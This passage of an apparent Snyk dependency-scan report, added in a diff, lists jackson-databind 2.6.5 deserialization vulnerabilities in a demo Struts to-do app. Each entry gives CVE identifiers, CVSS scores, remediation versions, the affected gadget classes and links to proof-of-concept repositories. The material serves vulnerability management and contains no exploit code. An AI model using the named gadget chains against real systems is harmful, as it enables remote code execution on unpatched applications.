"packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": "https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + 
{ + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": 
"ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose 
data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + 
"version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": 
"## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the 
general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": 
